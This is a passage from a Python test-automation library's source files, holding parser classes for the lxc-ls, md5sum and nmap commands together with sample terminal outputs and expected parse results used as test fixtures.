'IPv4': '10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253',
'IPv6': '-'
},
{
'Name': '0xe019',
'State': 'RUNNING',
'Autostart': '0',
'Groups': '-',
'IPv4': '10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253',
'IPv6': '-'
}
]
}
COMMAND_OUTPUT_3 = """
root@server~ >lxc-ls --nesting=3
0xe000 0xe000/0xe000 0xe000/0xe001 0xe000/0xe002 0xe000/0xe003 0xe000/0xe004 0xe000/0xe009 0xe000/0xe00a 0xe000/0xe00b 0xe000/0xe00c 0xe000/0xe00d
0xe000/0xe019 0xe001 0xe002 0xe002/0xe000 0xe002/0xe001 0xe002/0xe002 0xe002/0xe003 0xe002/0xe004 0xe002/0xe009 0xe002/0xe00a 0xe002/0xe00b
0xe002/0xe00c 0xe002/0xe00d 0xe002/0xe019 0xe003 0xe003/0xe000 0xe003/0xe001 0xe003/0xe002 0xe003/0xe003 0xe003/0xe004 0xe003/0xe009 0xe003/0xe00a
0xe003/0xe00b 0xe003/0xe00c 0xe003/0xe00d 0xe003/0xe019 0xe004 0xe004/0xe000 0xe004/0xe001 0xe004/0xe002 0xe004/0xe003 0xe004/0xe004 0xe004/0xe009
0xe004/0xe00a 0xe004/0xe00b 0xe004/0xe00c 0xe004/0xe00d 0xe004/0xe019 0xe009 0xe00a 0xe00a/0xe000 0xe00a/0xe001 0xe00a/0xe002 0xe00a/0xe003
0xe00a/0xe004 0xe00a/0xe009 0xe00a/0xe00a 0xe00a/0xe00b 0xe00a/0xe00c 0xe00a/0xe00d 0xe00a/0xe019 0xe00b 0xe00c 0xe00d 0xe019
0xe019/0xe000 0xe019/0xe001 0xe019/0xe002 0xe019/0xe003 0xe019/0xe004 0xe019/0xe009 0xe019/0xe00a 0xe019/0xe00b 0xe019/0xe00c 0xe019/0xe00d 0xe019/0xe019
root@server~ >"""
COMMAND_KWARGS_3 = {
"options": "--nesting=3"
}
COMMAND_RESULT_3 = {
"RESULT": [
['0xe000', '0xe000/0xe000', '0xe000/0xe001', '0xe000/0xe002', '0xe000/0xe003', '0xe000/0xe004', '0xe000/0xe009', '0xe000/0xe00a', '0xe000/0xe00b', '0xe000/0xe00c', '0xe000/0xe00d'],
['0xe000/0xe019', '0xe001', '0xe002', '0xe002/0xe000', '0xe002/0xe001', '0xe002/0xe002', '0xe002/0xe003', '0xe002/0xe004', '0xe002/0xe009', '0xe002/0xe00a', '0xe002/0xe00b'],
['0xe002/0xe00c', '0xe002/0xe00d', '0xe002/0xe019', '0xe003', '0xe003/0xe000', '0xe003/0xe001', '0xe003/0xe002', '0xe003/0xe003', '0xe003/0xe004', '0xe003/0xe009', '0xe003/0xe00a'],
['0xe003/0xe00b', '0xe003/0xe00c', '0xe003/0xe00d', '0xe003/0xe019', '0xe004', '0xe004/0xe000', '0xe004/0xe001', '0xe004/0xe002', '0xe004/0xe003', '0xe004/0xe004', '0xe004/0xe009'],
['0xe004/0xe00a', '0xe004/0xe00b', '0xe004/0xe00c', '0xe004/0xe00d', '0xe004/0xe019', '0xe009', '0xe00a', '0xe00a/0xe000', '0xe00a/0xe001', '0xe00a/0xe002', '0xe00a/0xe003'],
['0xe00a/0xe004', '0xe00a/0xe009', '0xe00a/0xe00a', '0xe00a/0xe00b', '0xe00a/0xe00c', '0xe00a/0xe00d', '0xe00a/0xe019', '0xe00b', '0xe00c', '0xe00d', '0xe019'],
['0xe019/0xe000', '0xe019/0xe001', '0xe019/0xe002', '0xe019/0xe003', '0xe019/0xe004', '0xe019/0xe009', '0xe019/0xe00a', '0xe019/0xe00b', '0xe019/0xe00c', '0xe019/0xe00d', '0xe019/0xe019']
]
}
"""
==================================================HELP=MESSAGE==========================================================
root@0xe000:~ >lxc-ls --help
Usage: lxc-ls
[-P lxcpath] [--active] [--running] [--frozen] [--stopped] [--nesting] [-g groups] [--filter regex]
[-1] [-P lxcpath] [--active] [--running] [--frozen] [--stopped] [--nesting] [-g groups] [--filter regex]
[-f] [-P lxcpath] [--active] [--running] [--frozen] [--stopped] [--nesting] [-g groups] [--filter regex]
lxc-ls list containers
Options :
-1, --line show one entry per line
-f, --fancy use a fancy, column-based output
-F, --fancy-format comma separated list of columns to show in the fancy output
valid columns are: NAME, STATE, PID, RAM, SWAP, AUTOSTART,
GROUPS, INTERFACE, IPV4 and IPV6
--active list only active containers
--running list only running containers
--frozen list only frozen containers
--stopped list only stopped containers
--defined list only defined containers
--nesting=NUM list nested containers up to NUM (default is 5) levels of nesting
--filter=REGEX filter container names by regular expression
-g --groups comma separated list of groups a container must have to be displayed
Common options :
-o, --logfile=FILE Output log to FILE instead of stderr
-l, --logpriority=LEVEL Set log priority to LEVEL
-q, --quiet Don't produce any output
-P, --lxcpath=PATH Use specified container path
-?, --help Give this help list
--usage Give a short usage message
--version Print the version number
Mandatory or optional arguments to long options are also mandatory or optional
for any corresponding short options.
See the lxc-ls man page for further information.
root@0xe000:~ >
"""
```
#### File: cmd/unix/md5sum.py
```python
from moler.cmd.unix.genericunix import GenericUnixCommand
from moler.exceptions import ParsingDone
import re
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>'
class Md5sum(GenericUnixCommand):
def __init__(self, connection, path, options=None, prompt=None, newline_chars=None, runner=None):
super(Md5sum, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars, runner=runner)
self.path = path
self.options = options
def build_command_string(self):
cmd = "md5sum"
if self.options:
cmd = "{} {} {}".format(cmd, self.path, self.options)
else:
cmd = "{} {}".format(cmd, self.path)
return cmd
def on_new_line(self, line, is_full_line):
if is_full_line:
try:
self._parse_line(line)
except ParsingDone:
pass
return super(Md5sum, self).on_new_line(line, is_full_line)
_re_parse_line = re.compile(r'(?P<SUM>[\da-f]{32})\s+(?P<FILE>\S+)')
def _parse_line(self, line):
if self._regex_helper.search_compiled(Md5sum._re_parse_line, line):
self.current_ret['SUM'] = self._regex_helper.group("SUM")
self.current_ret['FILE'] = self._regex_helper.group("FILE")
raise ParsingDone
COMMAND_OUTPUT_parms = """
ute@debdev:~$ md5sum test.txt
91503d6cac7a663901b30fc400e93644 test.txt
ute@debdev:~$
"""
COMMAND_RESULT_parms = {
'FILE': u'test.txt',
'SUM': u'91503d6cac7a663901b30fc400e93644'
}
COMMAND_KWARGS_parms = {
"path": "test.txt",
}
```
#### File: cmd/unix/nmap.py
```python
__author__ = '<NAME>, <NAME>, <NAME>, <NAME>'
__copyright__ = 'Copyright (C) 2018-2020, Nokia'
__email__ = '<EMAIL>, <EMAIL>, <EMAIL>,' \
'<EMAIL>'
import re
from moler.cmd.unix.genericunix import GenericUnixCommand
from moler.exceptions import ParsingDone
from moler.exceptions import CommandFailure
from moler.util.converterhelper import ConverterHelper
class Nmap(GenericUnixCommand):
def __init__(self, connection, ip, is_ping=False, options=None, prompt=None, newline_chars=None, runner=None):
"""
:param connection: Moler connection to device, terminal when command is executed.
:param ip: IP address of host.
:param is_ping: If True then skip host discovery.
:param options: Options of command nmap.
:param prompt: prompt (on system where command runs).
:param newline_chars: Characters to split lines - list.
:param runner: Runner to run command.
"""
super(Nmap, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars, runner=runner)
self.options = options
self.ip = ip
self.is_ping = is_ping
self.timeout = 120 # Time in seconds
self._converter_helper = ConverterHelper.get_converter_helper()
def build_command_string(self):
"""
:return: String representation of command to send over connection to device.
"""
cmd = "nmap"
if self.options:
cmd = "{} {}".format(cmd, self.options)
cmd = "{} {}".format(cmd, self.ip)
if not self.is_ping:
cmd = "{} -PN".format(cmd)
return cmd
def on_new_line(self, line, is_full_line):
"""
Put your parsing code here.
:param line: Line to process, can be only part of line. New line chars are removed from line.
:param is_full_line: True if line had new line chars, False otherwise
:return: None
"""
if is_full_line:
self._parse_extend_timeout(line)
try:
self._parse_error(line)
self._parse_ports_line(line)
self._parse_raw_packets(line)
self._parse_scan_report(line)
self._parse_scan_reports(line)
self._parse_syn_stealth_scan(line)
self._parse_skipping_host(line)
self._parse_ciphers(line)
except ParsingDone:
pass
return super(Nmap, self).on_new_line(line, is_full_line)
_re_ports_line = re.compile(r"^(?P<LINES>(?P<PORTS>(?P<PORT>\d+)\/(?P<TYPE>\w+))\s+"
r"(?P<STATE>\S+)\s+(?P<SERVICE>\S+)\s*(?P<REASON>\S+)?\s*)$")
def _parse_ports_line(self, line):
if self._regex_helper.search_compiled(Nmap._re_ports_line, line):
if "PORTS" not in self.current_ret:
self.current_ret["PORTS"] = dict()
if "LINES" not in self.current_ret["PORTS"]:
self.current_ret["PORTS"]["LINES"] = list()
ports = self._regex_helper.group("PORTS")
self.current_ret["PORTS"][ports] = self._regex_helper.groupdict()
self.current_ret["PORTS"]["LINES"].append(self._regex_helper.group("LINES"))
del (self.current_ret["PORTS"][ports]["PORTS"])
del (self.current_ret["PORTS"][ports]["LINES"])
raise ParsingDone
# Raw packets sent: 65544 (2.884MB) | Rcvd: 65528 (2.621MB)
_re_raw_packets = re.compile(r"Raw packets sent: (?P<SENT_NO>\d+)\s+\((?P<SENT_SIZE>\S+)\)\s+"
r"\|\s+Rcvd:\s+(?P<RCVD_NO>\d+)\s+\((?P<RCVD_SIZE>\S+)\)")
def _parse_raw_packets(self, line):
if self._regex_helper.search_compiled(Nmap._re_raw_packets, line):
if "RAW_PACKETS" not in self.current_ret:
self.current_ret["RAW_PACKETS"] = dict()
self.current_ret["RAW_PACKETS"] = self._regex_helper.groupdict()
raise ParsingDone
# Nmap scan report for 192.168.255.4 [host down, received no-response]
_re_scan_report = re.compile(r"(?P<LINE>Nmap scan report for (?P<ADDRESS>\S+)\s+\[host\s+"
r"(?P<HOST>\S+),\s+received\s+(?P<RECEIVED>\S+)\])")
def _parse_scan_report(self, line):
if self._regex_helper.search_compiled(Nmap._re_scan_report, line):
if "SCAN_REPORT" not in self.current_ret:
self.current_ret["SCAN_REPORT"] = dict()
self.current_ret["SCAN_REPORT"] = self._regex_helper.groupdict()
raise ParsingDone
# Nmap scan report for 192.168.255.132
_re_scan_reports = re.compile(r"(?P<LINE>Nmap scan report for (?P<ADDRESS>\S+)"
r"(?:\s+\[host\s+(?P<HOST>\S+),\s+received\s+(?P<RECEIVED>\S+)\])?)")
def _parse_scan_reports(self, line):
if self._regex_helper.search_compiled(Nmap._re_scan_reports, line):
if "SCAN_REPORTS" not in self.current_ret:
self.current_ret["SCAN_REPORTS"] = list()
self.current_ret["SCAN_REPORTS"].append(self._regex_helper.groupdict())
raise ParsingDone
# if "HOST" not in self.current_ret["SKIPPING_HOST"]:
# self.current_ret["SKIPPING_HOST"]["HOST"] = list()
# self.current_ret["SKIPPING_HOST"]["HOST"].append(self._regex_helper.group("HOST"))
# SYN Stealth Scan Timing: About 78.01% done; ETC: 23:30 (0:00:52 remaining)
_re_syn_stealth_scan = re.compile(r"SYN Stealth Scan Timing: About (?P<DONE>[\d\.]+)% done; "
r"ETC: (?P<ETC>[\d:]+) \((?P<REMAINING>[\d:]+) remaining\)")
def _parse_syn_stealth_scan(self, line):
if self._regex_helper.search_compiled(Nmap._re_syn_stealth_scan, line):
if "SYN_STEALTH_SCAN" not in self.current_ret:
self.current_ret["SYN_STEALTH_SCAN"] = dict()
self.current_ret["SYN_STEALTH_SCAN"] = self._regex_helper.groupdict()
raise ParsingDone
# Failed to open normal output file /logs/IP_Protocol_Discovery_BH_IPv4.nmap for writing
_re_fail_file = re.compile(r"Failed to open.*file", re.I)
def _parse_error(self, line):
if self._regex_helper.search_compiled(Nmap._re_fail_file, line):
self.set_exception(CommandFailure(self, "Fail in line: '{}'".format(line)))
raise ParsingDone()
# Skipping host 10.9.134.1 due to host timeout
_re_skipping_host = re.compile(r"Skipping host (?P<HOST>\S+) due to host timeout")
def _parse_skipping_host(self, line):
if self._regex_helper.search_compiled(Nmap._re_skipping_host, line):
if "SKIPPING_HOST" not in self.current_ret:
self.current_ret["SKIPPING_HOST"] = dict()
if "HOST" not in self.current_ret["SKIPPING_HOST"]:
self.current_ret["SKIPPING_HOST"]["HOST"] = list()
self.current_ret["SKIPPING_HOST"]["HOST"].append(self._regex_helper.group("HOST"))
raise ParsingDone
# UDP Scan Timing: About 61.09% done; ETC: 14:18 (0:21:04 remaining)
_re_extend_timeout = re.compile(r"\((?P<HOURS>\d+):(?P<MINUTES>\d+):(?P<SECONDS>\d+)\s+remaining\)")
def _parse_extend_timeout(self, line):
if self._regex_helper.search_compiled(Nmap._re_extend_timeout, line):
timedelta = self._converter_helper.to_number(
self._regex_helper.group("HOURS")) * 3600 + self._converter_helper.to_number(
self._regex_helper.group("MINUTES")) * 60 + self._converter_helper.to_number(
self._regex_helper.group("SECONDS"))
self.extend_timeout(timedelta=timedelta)
# | TLS_ABC_RSA_WITH_AED_256_GCB_SHA123
_re_cipher = re.compile(r"\|\s*(?P<CIPHER>TLS_[^\s]+)")
def _parse_ciphers(self, line):
if self._regex_helper.search_compiled(Nmap._re_cipher, line):
if "CIPHERS" not in self.current_ret:
self.current_ret["CIPHERS"] = list()
self.current_ret["CIPHERS"].append(self._regex_helper.group("CIPHER"))
raise ParsingDone
COMMAND_OUTPUT_host_up = """
root@cp19-nj:/home/ute# nmap -d1 -p- -S 192.168.255.126 192.168.255.129 -PN
Starting Nmap 6.00 ( http://nmap.org ) at 2018-05-23 08:36 CST
--------------- Timing report ---------------
hostgroups: min 1, max 100000
rtt-timeouts: init 1000, min 100, max 10000
max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
parallelism: min 0, max 0
max-retries: 10, host-timeout: 0
min-rate: 0, max-rate: 0
---------------------------------------------
Initiating ARP Ping Scan at 08:36
Scanning 192.168.255.129 [1 port]
Packet capture filter (device eth1): arp and arp[18:4] = 0xFE365EB1 and arp[22:2] = 0x1AE6
Completed ARP Ping Scan at 08:36, 0.03s elapsed (1 total hosts)
Overall sending rates: 34.08 packets / s, 1431.20 bytes / s.
mass_rdns: Using DNS server 192.168.3.11
mass_rdns: Using DNS server 172.16.31.10
Initiating Parallel DNS resolution of 1 host. at 08:36
mass_rdns: 13.00s 0/1 [#: 2, OK: 0, NX: 0, DR: 0, SF: 0, TR: 4]
Completed Parallel DNS resolution of 1 host. at 08:36, 13.00s elapsed
DNS resolution of 1 IPs took 13.00s. Mode: Async [#: 2, OK: 0, NX: 0, DR: 1, SF: 0, TR: 4, CN: 0]
Initiating SYN Stealth Scan at 08:36
Scanning 192.168.255.129 [65535 ports]
Packet capture filter (device eth1): dst host 192.168.255.126 and (icmp or icmp6 or ((tcp or udp or sctp) and (src host 192.168.255.129)))
Discovered open port 443/tcp on 192.168.255.129
Discovered open port 6001/tcp on 192.168.255.129
Discovered open port 12000/tcp on 192.168.255.129
Discovered open port 3300/tcp on 192.168.255.129
Discovered open port 12001/tcp on 192.168.255.129
Completed SYN Stealth Scan at 08:36, 4.31s elapsed (65535 total ports)
Overall sending rates: 15200.28 packets / s, 668812.33 bytes / s.
Nmap scan report for 192.168.255.129
Host is up, received arp-response (0.00049s latency).
Scanned at 2018-05-23 08:36:34 CST for 18s
Not shown: 65522 closed ports
Reason: 65522 resets
PORT STATE SERVICE REASON
21/tcp filtered ftp no-response
22/tcp filtered ssh no-response
443/tcp open https syn-ack
3300/tcp open unknown syn-ack
6001/tcp open X11:1 syn-ack
12000/tcp open cce4x syn-ack
12001/tcp open entextnetwk syn-ack
15001/tcp filtered unknown no-response
15002/tcp filtered unknown no-response
15003/tcp filtered unknown no-response
15004/tcp filtered unknown no-response
15005/tcp filtered unknown no-response
15007/tcp filtered unknown no-response
MAC Address: 74:DA:EA:53:D6:24 (Unknown)
Final times for host: srtt: 490 rttvar: 90 to: 100000
Read from /usr/bin/../share/nmap: nmap-mac-prefixes nmap-payloads nmap-services.
Nmap done: 1 IP address (1 host up) scanned in 17.52 seconds
Raw packets sent: 65544 (2.884MB) | Rcvd: 65528 (2.621MB)
root@cp19-nj:/home/ute# """
COMMAND_KWARGS_host_up = {'options': '-d1 -p- -S 192.168.255.126',
'ip': '192.168.255.129'}
COMMAND_RESULT_host_up = {
'PORTS': {
'LINES': [
'21/tcp filtered ftp no-response',
'22/tcp filtered ssh no-response',
'443/tcp open https syn-ack',
'3300/tcp open unknown syn-ack',
'6001/tcp open X11:1 syn-ack',
'12000/tcp open cce4x syn-ack',
'12001/tcp open entextnetwk syn-ack',
'15001/tcp filtered unknown no-response',
'15002/tcp filtered unknown no-response',
'15003/tcp filtered unknown no-response',
'15004/tcp filtered unknown no-response',
'15005/tcp filtered unknown no-response',
'15007/tcp filtered unknown no-response'
],
'21/tcp': {
'PORT': '21',
'REASON': 'no-response',
'SERVICE': 'ftp',
'STATE': 'filtered',
'TYPE': 'tcp'
},
'22/tcp': {
'PORT': '22',
'REASON': 'no-response',
'SERVICE': 'ssh',
'STATE': 'filtered',
'TYPE': 'tcp'
},
'443/tcp': {
'PORT': '443',
'REASON': 'syn-ack',
'SERVICE': 'https',
'STATE': 'open',
'TYPE': 'tcp'
},
'3300/tcp': {
'PORT': '3300',
'REASON': 'syn-ack',
'SERVICE': 'unknown',
'STATE': 'open',
'TYPE': 'tcp'
},
'6001/tcp': {
'PORT': '6001',
'REASON': 'syn-ack',
'SERVICE': 'X11:1',
'STATE': 'open',
'TYPE': 'tcp'
},
'12000/tcp': {
'PORT': '12000',
'REASON': 'syn-ack',
'SERVICE': 'cce4x',
'STATE': 'open',
'TYPE': 'tcp'
},
'12001/tcp': {
'PORT': '12001',
'REASON': 'syn-ack',
'SERVICE': 'entextnetwk',
'STATE': 'open',
'TYPE': 'tcp'
},
'15001/tcp': {
'PORT': '15001',
'REASON': 'no-response',
'SERVICE': 'unknown',
'STATE': 'filtered',
'TYPE': 'tcp'
},
'15002/tcp': {
'PORT': '15002',
'REASON': 'no-response',
'SERVICE': 'unknown',
'STATE': 'filtered',
'TYPE': 'tcp'
},
'15003/tcp': {
'PORT': '15003',
'REASON': 'no-response',
'SERVICE': 'unknown',
'STATE': 'filtered',
'TYPE': 'tcp'
},
'15004/tcp': {
'PORT': '15004',
'REASON': 'no-response',
'SERVICE': 'unknown',
'STATE': 'filtered',
'TYPE': 'tcp'
},
'15005/tcp': {
'PORT': '15005',
'REASON': 'no-response',
'SERVICE': 'unknown',
'STATE': 'filtered',
'TYPE': 'tcp'
},
'15007/tcp': {
'PORT': '15007',
'REASON': 'no-response',
'SERVICE': 'unknown',
'STATE': 'filtered',
'TYPE': 'tcp'
}
},
'RAW_PACKETS': {
'RCVD_NO': '65528',
'RCVD_SIZE': '2.621MB',
'SENT_NO': '65544',
'SENT_SIZE': '2.884MB'
},
'SCAN_REPORTS': [{u'ADDRESS': u'192.168.255.129',
u'HOST': None,
u'LINE': u'Nmap scan report for 192.168.255.129',
u'RECEIVED': None}]
}
COMMAND_OUTPUT_host_down = """root@cp19-nj:/home/ute# nmap -d1 -p- -S 192.168.255.126 192.168.255.4 -PN
Starting Nmap 6.00 ( http://nmap.org ) at 2018-05-25 08:40 CST
--------------- Timing report ---------------
hostgroups: min 1, max 100000
rtt-timeouts: init 1000, min 100, max 10000
max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
parallelism: min 0, max 0
max-retries: 10, host-timeout: 0
min-rate: 0, max-rate: 0
---------------------------------------------
Initiating ARP Ping Scan at 08:40
Scanning 192.168.255.4 [1 port]
Packet capture filter (device eth1): arp and arp[18:4] = 0xFE365EB1 and arp[22:2] = 0x1AE6
Completed ARP Ping Scan at 08:40, 0.43s elapsed (1 total hosts)
Overall sending rates: 4.61 packets / s, 193.61 bytes / s.
mass_rdns: Using DNS server 192.168.3.11
mass_rdns: Using DNS server 172.16.31.10
Nmap scan report for 192.168.255.4 [host down, received no-response]
Read from /usr/bin/../share/nmap: nmap-payloads nmap-services.
Nmap done: 1 IP address (0 hosts up) scanned in 0.54 seconds
Raw packets sent: 2 (56B) | Rcvd: 0 (0B)
root@cp19-nj:/home/ute# """
COMMAND_KWARGS_host_down = {'options': '-d1 -p- -S 192.168.255.126',
'ip': '192.168.255.4'}
COMMAND_RESULT_host_down = {
'RAW_PACKETS': {
'RCVD_NO': '0',
'RCVD_SIZE': '0B',
'SENT_NO': '2',
'SENT_SIZE': '56B'
},
'SCAN_REPORT': {
'ADDRESS': '192.168.255.4',
'HOST': 'down',
'LINE': 'Nmap scan report for 192.168.255.4 [host down, received no-response]',
'RECEIVED': 'no-response'
}
}
COMMAND_OUTPUT = """root@cp19-nj:/home/ute# nmap -d1 -p- --host-timeout 100 10.9.134.0/28 -PN
Starting Nmap 6.00 ( http://nmap.org ) at 2018-05-31 03:23 CST
--------------- Timing report ---------------
hostgroups: min 1, max 100000
rtt-timeouts: init 1000, min 100, max 10000
max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
parallelism: min 0, max 0
max-retries: 10, host-timeout: 100000
min-rate: 0, max-rate: 0
---------------------------------------------
mass_rdns: Using DNS server 192.168.3.11
mass_rdns: Using DNS server 172.16.31.10
Initiating Parallel DNS resolution of 16 hosts. at 03:23
mass_rdns: 0.01s 0/16 [#: 2, OK: 0, NX: 0, DR: 0, SF: 0, TR: 16]
Completed Parallel DNS resolution of 16 hosts. at 03:23, 9.08s elapsed
DNS resolution of 16 IPs took 9.08s. Mode: Async [#: 2, OK: 0, NX: 16, DR: 0, SF: 0, TR: 36, CN: 0]
Initiating SYN Stealth Scan at 03:23
Scanning 4 hosts [65535 ports/host]
Packet capture filter (device eth0): dst host 10.9.132.16 and (icmp or icmp6 or ((tcp or udp or sctp) and (src host 10.9.134.0 or src host 10.9.134.1 or src host 10.9.134.2 or src host 10.9.134.3)))
Discovered open port 23/tcp on 10.9.134.1
Discovered open port 80/tcp on 10.9.134.1
Discovered open port 22/tcp on 10.9.134.1
Discovered open port 443/tcp on 10.9.134.1
Discovered open port 21/tcp on 10.9.134.1
Increased max_successful_tryno for 10.9.134.1 to 1 (packet drop)
Increased max_successful_tryno for 10.9.134.1 to 2 (packet drop)
Increased max_successful_tryno for 10.9.134.1 to 3 (packet drop)
Increased max_successful_tryno for 10.9.134.1 to 4 (packet drop)
Increasing send delay for 10.9.134.1 from 0 to 5 due to max_successful_tryno increase to 4
Increased max_successful_tryno for 10.9.134.1 to 5 (packet drop)
Increasing send delay for 10.9.134.1 from 5 to 10 due to max_successful_tryno increase to 5
Increased max_successful_tryno for 10.9.134.1 to 6 (packet drop)
Increasing send delay for 10.9.134.1 from 10 to 20 due to max_successful_tryno increase to 6
SYN Stealth Scan Timing: About 0.49% done
SYN Stealth Scan Timing: About 1.98% done; ETC: 04:15 (0:50:16 remaining)
Increased max_successful_tryno for 10.9.134.1 to 7 (packet drop)
Increasing send delay for 10.9.134.1 from 20 to 40 due to max_successful_tryno increase to 7
Increased max_successful_tryno for 10.9.134.1 to 8 (packet drop)
Increasing send delay for 10.9.134.1 from 40 to 80 due to max_successful_tryno increase to 8
SYN Stealth Scan Timing: About 3.32% done; ETC: 04:09 (0:44:09 remaining)
10.9.134.0 timed out during SYN Stealth Scan (3 hosts left)
10.9.134.1 timed out during SYN Stealth Scan (2 hosts left)
10.9.134.2 timed out during SYN Stealth Scan (1 host left)
10.9.134.3 timed out during SYN Stealth Scan (0 hosts left)
Completed SYN Stealth Scan at 03:25, 100.05s elapsed (4 hosts timed out)
Overall sending rates: 230.05 packets / s, 10122.35 bytes / s.
Nmap scan report for 10.9.134.0
Host is up, received user-set.
Skipping host 10.9.134.0 due to host timeout
Nmap scan report for 10.9.134.1
Host is up, received user-set (0.0035s latency).
Skipping host 10.9.134.1 due to host timeout
Nmap scan report for 10.9.134.2
Host is up, received user-set.
Skipping host 10.9.134.2 due to host timeout
Nmap scan report for 10.9.134.3
Host is up, received user-set.
Skipping host 10.9.134.3 due to host timeout
Initiating SYN Stealth Scan at 03:25
Scanning 12 hosts [65535 ports/host]
Packet capture filter (device eth0): dst host 10.9.132.16 and (icmp or icmp6 or ((tcp or udp or sctp) and (src host 10.9.134.4 or src host 10.9.134.5 or src host 10.9.134.6 or src host 10.9.134.7 or src host 10.9.134.8 or src host 10.9.134.9 or src host 10.9.134.10 or src host 10.9.134.11 or src host 10.9.134.12 or src host 10.9.134.13 or src host 10.9.134.14 or src host 10.9.134.15)))
Discovered open port 23/tcp on 10.9.134.4
Discovered open port 445/tcp on 10.9.134.12
Discovered open port 445/tcp on 10.9.134.13
Discovered open port 3389/tcp on 10.9.134.12
Discovered open port 3389/tcp on 10.9.134.13
Discovered open port 135/tcp on 10.9.134.12
Discovered open port 443/tcp on 10.9.134.12
Discovered open port 135/tcp on 10.9.134.13
Discovered open port 139/tcp on 10.9.134.12
Discovered open port 443/tcp on 10.9.134.13
Discovered open port 139/tcp on 10.9.134.13
Increased max_successful_tryno for 10.9.134.12 to 1 (packet drop)
Discovered open port 22/tcp on 10.9.134.4
Increased max_successful_tryno for 10.9.134.13 to 1 (packet drop)
Discovered open port 443/tcp on 10.9.134.4
Discovered open port 22/tcp on 10.9.134.15
Discovered open port 21/tcp on 10.9.134.4
SYN Stealth Scan Timing: About 1.04% done; ETC: 04:15 (0:49:20 remaining)
SYN Stealth Scan Timing: About 4.44% done; ETC: 03:48 (0:21:52 remaining)
SYN Stealth Scan Timing: About 11.04% done; ETC: 03:39 (0:12:13 remaining)
10.9.134.4 timed out during SYN Stealth Scan (11 hosts left)
10.9.134.5 timed out during SYN Stealth Scan (10 hosts left)
10.9.134.6 timed out during SYN Stealth Scan (9 hosts left)
10.9.134.7 timed out during SYN Stealth Scan (8 hosts left)
10.9.134.8 timed out during SYN Stealth Scan (7 hosts left)
10.9.134.9 timed out during SYN Stealth Scan (6 hosts left)
10.9.134.10 timed out during SYN Stealth Scan (5 hosts left)
10.9.134.11 timed out during SYN Stealth Scan (4 hosts left)
10.9.134.12 timed out during SYN Stealth Scan (3 hosts left)
10.9.134.13 timed out during SYN Stealth Scan (2 hosts left)
10.9.134.14 timed out during SYN Stealth Scan (1 host left)
10.9.134.15 timed out during SYN Stealth Scan (0 hosts left)
Completed SYN Stealth Scan at 03:27, 100.00s elapsed (12 hosts timed out)
Overall sending rates: 1876.97 packets / s, 82586.62 bytes / s.
Nmap scan report for 10.9.134.4
Host is up, received user-set (0.00045s latency).
Skipping host 10.9.134.4 due to host timeout
Nmap scan report for 10.9.134.5
Host is up, received user-set.
Skipping host 10.9.134.5 due to host timeout
Nmap scan report for 10.9.134.6
Host is up, received user-set.
Skipping host 10.9.134.6 due to host timeout
Nmap scan report for 10.9.134.7
Host is up, received user-set.
Skipping host 10.9.134.7 due to host timeout
Nmap scan report for 10.9.134.8
Host is up, received user-set.
Skipping host 10.9.134.8 due to host timeout
Nmap scan report for 10.9.134.9
Host is up, received user-set.
Skipping host 10.9.134.9 due to host timeout
Nmap scan report for 10.9.134.10
Host is up, received user-set.
Skipping host 10.9.134.10 due to host timeout
Nmap scan report for 10.9.134.11
Host is up, received user-set.
Skipping host 10.9.134.11 due to host timeout
Nmap scan report for 10.9.134.12
Host is up, received user-set (0.00023s latency).
Skipping host 10.9.134.12 due to host timeout
Nmap scan report for 10.9.134.13
Host is up, received user-set (0.00030s latency).
Skipping host 10.9.134.13 due to host timeout
Nmap scan report for 10.9.134.14
Host is up, received user-set.
Skipping host 10.9.134.14 due to host timeout
Nmap scan report for 10.9.134.15
Host is up, received user-set (0.00030s latency).
Skipping host 10.9.134.15 due to host timeout
Read from /usr/bin/../share/nmap: nmap-payloads nmap-services.
Nmap done: 16 IP addresses (16 hosts up) scanned in 209.25 seconds
Raw packets sent: 210722 (9.272MB) | Rcvd: 18224 (730.812KB)
root@cp19-nj:/home/ute# """
COMMAND_KWARGS = {'options': '-d1 -p- --host-timeout 100',
'ip': '10.9.134.0/28'}
COMMAND_RESULT = {
'RAW_PACKETS': {
'RCVD_NO': '18224',
'RCVD_SIZE': '730.812KB',
'SENT_NO': '210722',
'SENT_SIZE': '9.272MB'
},
'SKIPPING_HOST': {
'HOST': [
'10.9.134.0',
'10.9.134.1',
'10.9.134.2',
'10.9.134.3',
'10.9.134.4',
'10.9.134.5',
'10.9.134.6',
'10.9.134.7',
'10.9.134.8',
'10.9.134.9',
'10.9.134.10',
'10.9.134.11',
'10.9.134.12',
'10.9.134.13',
'10.9.134.14',
'10.9.134.15']},
'SYN_STEALTH_SCAN': {
'DONE': '11.04',
'ETC': '03:39',
'REMAINING': '0:12:13'
},
'SCAN_REPORTS': [{u'ADDRESS': u'10.9.134.0',
u'HOST': None,
u'LINE': u'Nmap scan report for 10.9.134.0',
u'RECEIVED': None},
{u'ADDRESS': u'10.9.134.1',
u'HOST': None,
u'LINE': u'Nmap scan report for 10.9.134.1',
u'RECEIVED': None},
{u'ADDRESS': u'10.9.134.2',
u'HOST': None,
u'LINE': u'Nmap scan report for 10.9.134.2',
u'RECEIVED': None},
{u'ADDRESS': u'10.9.134.3',
u'HOST': None,
u'LINE': u'Nmap scan report for 10.9.134.3',
u'RECEIVED': None},
{u'ADDRESS': u'10.9.134.4',
u'HOST': None,
u'LINE': u'Nmap scan report for 10.9.134.4',
u'RECEIVED': None},
{u'ADDRESS': u'10.9.134.5',
u'HOST': None,
